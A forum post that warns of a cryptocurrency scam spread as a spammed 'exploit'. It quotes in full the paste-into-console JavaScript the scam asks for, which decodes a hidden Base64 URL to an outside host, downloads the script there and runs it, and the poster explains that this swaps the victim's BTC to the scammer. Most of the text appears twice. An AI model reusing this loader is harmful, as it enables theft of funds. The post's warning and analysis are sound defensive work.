06-09-25, 07:56 AM
I'm only writing this because I know many
will fall for it. Since it was automated, you’ve likely already received a message like this
![[Image: Kn55edN.png]](https://iili.io/Kn55edN.png)
This message aims to subtly inform you about the so-called “exploit” or profit method, since directly giving you a money making tactic may seem unrealistic.
If you follow the link to the “exploit,” you’ll encounter a lot of nonsense explaining it and how to use it.
https://docs.google.com/document/d/1EW7c...it?tab=t.0
In short they want you to put this code in your console:
The regex /changenow\/(.*?)\// finds the substring between changenow/ and the next /.
From your URL, that substring is aHR0cHM6Ly9nLmxxemNkbi5jb20vMC5waHA= which is Base64.
atob(...) decodes that Base64 into: https://g.lqzcdn.com/0.php
fetch(...) downloads whatever is at that URL.
Function(c )() is equivalent to eval-like execution: it runs the downloaded code with full privileges of the page context.
![[Image: Kn5vTp1.png]](https://iili.io/Kn5vTp1.png)
You dont even need to decipher the code to guess what this will eventually do. It will swap your BTC to the scammer's address.
![[Image: Kn5Syrv.png]](https://iili.io/Kn5Syrv.png)
Congrats to the first
: https://www.blockchain.com/explorer/addr...c8hh3zys5l
will fall for it. Since it was automated, you’ve likely already received a message like this![[Image: Kn55edN.png]](https://iili.io/Kn55edN.png)
This message aims to subtly inform you about the so-called “exploit” or profit method, since directly giving you a money making tactic may seem unrealistic.
If you follow the link to the “exploit,” you’ll encounter a lot of nonsense explaining it and how to use it.
https://docs.google.com/document/d/1EW7c...it?tab=t.0
In short they want you to put this code in your console:
Code:
(()=>{
let node = 'https://swapzone.io/exchange/nodes/changenow/aHR0cHM6Ly9nLmxxemNkbi5jb20vMC5waHA=/btc/node-1.9.js'
.match(/changenow\/(.*?)\//)[1]; // 1) Extracts the part after "changenow/" up to the next "/"
fetch(atob(node)) // 2) Decodes that part from Base64 and fetches it as a URL
.then(r => r.text()) // 3) Reads the response as text (JavaScript source)
.then(c => Function(c)()) // 4) Creates a new function from the code and executes it
})();The regex /changenow\/(.*?)\// finds the substring between changenow/ and the next /.
From your URL, that substring is aHR0cHM6Ly9nLmxxemNkbi5jb20vMC5waHA= which is Base64.
atob(...) decodes that Base64 into: https://g.lqzcdn.com/0.php
fetch(...) downloads whatever is at that URL.
Function(c )() is equivalent to eval-like execution: it runs the downloaded code with full privileges of the page context.
![[Image: Kn5vTp1.png]](https://iili.io/Kn5vTp1.png)
You dont even need to decipher the code to guess what this will eventually do. It will swap your BTC to the scammer's address.
![[Image: Kn5Syrv.png]](https://iili.io/Kn5Syrv.png)
Congrats to the first
: https://www.blockchain.com/explorer/addr...c8hh3zys5l
